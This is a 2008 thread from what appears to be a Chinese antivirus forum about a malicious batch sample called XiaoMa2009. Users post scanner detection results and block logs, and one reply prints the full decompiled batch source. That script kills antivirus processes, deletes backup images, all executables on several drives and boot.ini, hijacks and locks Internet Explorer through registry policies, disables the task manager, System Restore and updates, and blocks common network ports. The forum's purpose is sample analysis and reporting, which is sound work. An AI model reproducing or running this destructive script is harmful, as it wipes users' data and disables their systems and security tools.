查看: 15558|回复: 86
收起左侧

[病毒样本] “圣诞菁菁”恶意脚本程序,过所有杀毒软件!【恶】

[复制链接]
majing103
发表于 2008-12-21 11:34:51 | 显示全部楼层 |阅读模式
在网上找的,作者XIAOMA,还在上大专。。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
woai_jolin
发表于 2008-12-21 11:36:30 | 显示全部楼层
send to eset
su-tt
发表于 2008-12-21 11:38:51 | 显示全部楼层
继续上报
清澈燃烧
发表于 2008-12-21 11:41:12 | 显示全部楼层
过了卡巴,上报
su-tt
发表于 2008-12-21 11:42:12 | 显示全部楼层
Antivirus
VersionLast UpdateResult
AhnLab-V32008.12.19.32008.12.20-
AntiVir7.9.0.452008.12.19-
Authentium5.1.0.42008.12.20-
Avast4.8.1281.02008.12.20-
AVG8.0.0.1992008.12.20SHeur2.GHA
BitDefender7.22008.12.21DeepScan:Generic.Malware.DATk.63BE6823
CAT-QuickHeal10.002008.12.20-
ClamAV0.94.12008.12.20-
Comodo7832008.12.20-
DrWeb4.44.0.091702008.12.21-
eSafe7.0.17.02008.12.18-
eTrust-Vet31.6.62712008.12.20-
Ewido4.02008.12.20-
F-Prot4.4.4.562008.12.20-
F-Secure8.0.14332.02008.12.20-
Fortinet3.117.0.02008.12.21-
GData192008.12.21DeepScan:Generic.Malware.DATk.63BE6823
IkarusT3.1.1.45.02008.12.21BAT.Trojan.FormatCQ
K7AntiVirus7.10.5602008.12.20-
Kaspersky7.0.0.1252008.12.21-
McAfee54702008.12.20-
McAfee+Artemis54702008.12.20-
Microsoft1.42052008.12.20-
NOD3237092008.12.20-
Norman5.80.022008.12.19-
Panda9.0.0.42008.12.20-
PCTools4.4.2.02008.12.20-
Prevx1V22008.12.21-
Rising21.08.52.002008.12.20-
SecureWeb-Gateway6.7.62008.12.19-
Sophos4.37.02008.12.21-
Sunbelt3.2.1801.22008.12.11-
Symantec102008.12.21-
TheHacker6.3.1.4.1952008.12.20-
TrendMicro8.700.0.10042008.12.19-
VBA323.12.8.102008.12.20-
ViRobot2008.12.20.15282008.12.20-
VirusBuster4.5.11.02008.12.20-
Additional information
File size: 55808 bytes
MD5...: 84c64067c1ed16f81725a1fce7be7f73
SHA1..: 5ee95c01198100d642844d59fa86ce14b74b0c30
SHA256: 4b109f28db13cdcd3bda9266581021739b8a4af3249052826bb6d49762b49a49
SHA512: cee01c1c20ec7253e138337dceb95fcb81703e060d405553b991fd479573741f
551bd5a2aa46edd3479e7df76b5dc1ed5139d5d1d62d276654cf3e246f9cf195
ssdeep: 768:U9J8NowRheD8/3rJiUqyet8w9abyzS5E50kyoVonvnRiZljBwiwo5sWGeM1Q
C4iY:U9wvQUreUbyzsB+2zeNOg5TbO8mnWN
没有全过的说
zj0
发表于 2008-12-21 11:48:24 | 显示全部楼层
2008-12-21 11:47:06        应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\XiaoMa2009\XiaoMa2009.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~1.bat "C:\Documents and Settings\Administrator\桌面\XiaoMa2009\XiaoMa2009.exe"
EQ拦截 过小A
Sherry.ai
发表于 2008-12-21 11:51:47 | 显示全部楼层
To Rising
evanle
发表于 2008-12-21 11:58:54 | 显示全部楼层
过NIS2009
雨宫优子
发表于 2008-12-21 12:02:46 | 显示全部楼层
刚刚在分析,到Ollydbg跑了一阵,结果.....突然发现这个其实是用Quick Batch File Compiler转成的EXE..
BAT文件如下
我想应该很明朗..

  1. @shift
  2. title IE SCROLLER BY XIAOMA
  3. @echo off  仅供娱乐使用 ,如想回复请咨询小马或查找DOS编程书籍。
  4. xiaoma.exe
  5. autor.exe
  6. taskkill /f /im iexplore.exe /t
  7. taskkill /f /im avp.exe /t
  8. taskkill /f /im KAVStart.exe /t
  9. taskkill /f /im KWatch.exe /t
  10. taskkill /f /im KMailMon.exe /t
  11. taskkill /f /im KASMain.exe /t
  12. taskkill /f /im KISLnchr.exe /t
  13. taskkill /f /im KPFWSvc.exe /t
  14. taskkill /f /im vrvrf_c.exe /t
  15. taskkill /f /im vrvedp_m.exe /t
  16. taskkill /f /im vrvsafec.exe /t
  17. taskkill /f /im watchclient.exe /t
  18. taskkill /f /im Rav.exe /t
  19. taskkill /f /im MDM.EXE /t
  20. taskkill /f /im alg.exe /t
  21. taskkill /f /QQ.exe /t
  22. taskkill /f /Thunder5.exe /t
  23. del D:\*.GHO
  24. del D:\GHOST\*.*
  25. RD D:\~1
  26. del C:\*.GHO
  27. del C:\*.exe
  28. del D:\*.exe
  29. del E:\*.exe
  30. reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.hao123.com/?xiaoma201 /f
  31. reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.hao123.com/?xiaoma201 /f
  32. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v homepage /t REG_DWORD /d 00000001 /f
  33. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Cache /t REG_DWORD /d 00000001 /f
  34. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v History /t REG_DWORD /d 00000001 /f
  35. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Colors /t REG_DWORD /d 00000001 /f
  36. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Languages /t REG_DWORD /d 00000001 /f
  37. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v NoBrowserContextMenu /t REG_DWORD /d 00000001 /f
  38. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Accessibility /t REG_DWORD /d 00000001 /f
  39. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Links /t REG_DWORD /d 00000001 /f
  40. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Rating /t REG_DWORD /d 00000001 /f
  41. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Certificates /t REG_DWORD /d 00000001 /f
  42. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v FormSuggestPasswords /t REG_DWORD /d 00000001 /f
  43. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Profiles /t REG_DWORD /d 00000001 /f
  44. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v ConnwizAdminLock /t REG_DWORD /d 00000001 /f
  45. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v ConnectionSettings /t REG_DWORD /d 00000001 /f
  46. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Proxy /t REG_DWORD /d 00000001 /f
  47. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Messaging /t REG_DWORD /d 00000001 /f
  48. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v CalendarContact /t REG_DWORD /d 00000001 /f
  49. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Check_If_Default /t REG_DWORD /d 00000001 /f
  50. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Advanced /t REG_DWORD /d 00000001 /f
  51. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v ResetWebSettings /t REG_DWORD /d 00000001 /f
  52. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v SecurityTab /t REG_DWORD /d 00000001 /f
  53. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v ProgramsTab /t REG_DWORD /d 00000001/f
  54. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v AdvancedTab /t REG_DWORD /d 00000001 /f
  55. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v ProgramsTab /t REG_DWORD /d 00000001 /f
  56. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoFavorites /t REG_DWORD /d 00000001 /f
  57. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserContextMenu /t REG_DWORD /d 00000001 /f
  58. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserSaveWebComplete /t REG_DWORD /d 00000001 /f
  59. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserColse /t REG_DWORD /d 00000001 /f
  60. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoViewSource /t REG_DWORD /d 00000001 /f
  61. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoHelpItemNetscapeHelp /t REG_DWORD /d 00000001 /f
  62. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoOpenInNewWnd /t REG_DWORD /d 00000001 /f
  63. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoSelectDownloadDir /t REG_DWORD /d 00000001 /f
  64. reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoFindFiles /t REG_DWORD /d 00000001 /f
  65. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v Disableregistrytools /t REG_DWORD /d 00000001 /f
  66. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 00000001 /f
  67. reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v PaintDesktopVersion /t REG_DWORD /d 00000001 /f
  68. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  69. reg add
  70. "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
  71. reg add
  72. "HKEY_LOCAL_MACHINE\system\currentcontrolset\control\filesystem
  73. /v win31filesystem /t REG_DWORD /d 00000000 /f
  74. reg add
  75. "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f
  76. net localgrounp XiaoMa 805753077
  77. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
  78. md C:\setup\pandaGAME\Version1.03.669\FRONTPAGE\autorun\autorun.inf\oolgcg\fuckyou\punYU\USB Drive2006\sharuansoft
  79. REGEDIT /S USBlock.reg
  80. REGEDIT /S IEnamechange.reg
  81. REGEDIT /S lockxuanxiang.reg
  82. ipseccmd -w REG -p "mayunhao" -r "Block TCP/21" -f *+0:21:TCP -n BLOCK -x >nul
  83. ipseccmd -w REG -p "mayunhao" -r "Block TCP/25" -f *+0:25:TCP -n BLOCK -x >nul
  84. ipseccmd -w REG -p "mayunhao" -r "Block TCP/53" -f *+0:53:TCP -n BLOCK -x >nul
  85. ipseccmd -w REG -p "mayunhao" -r "Block TCP/80" -f *+0:80:TCP -n BLOCK -x >nul
  86. ipseccmd -w REG -p "mayunhao" -r "Block TCP/443" -f *+0:443:TCP -n BLOCK -x >nul
  87. copy ContextBG.dll %systemroot%\
  88. regsvr32 c:\windows\ContextBG.dll
  89. taskkill /f /im Explorer.EXE /t
  90. del C:\boot.ini
  91. RD C:\Program Files\WinRAR

复制代码
hddu
发表于 2008-12-21 12:13:14 | 显示全部楼层
EQ成功拦截:

2008-12-21 12:16:50    创建文件      操作:阻止并结束进程
进程路径:E:\下载\XiaoMa2009\XiaoMa2009.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\~3.bat
触发规则:应用程序规则->重点保护->?:\*->*\temp\*.bat

2008-12-21 12:17:01    创建文件      操作:阻止并结束进程
进程路径:E:\下载\XiaoMa2009\XiaoMa2009.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\~4.bat
触发规则:应用程序规则->重点保护->?:\*->*\temp\*.bat
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-3 18:46 , Processed in 0.136415 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表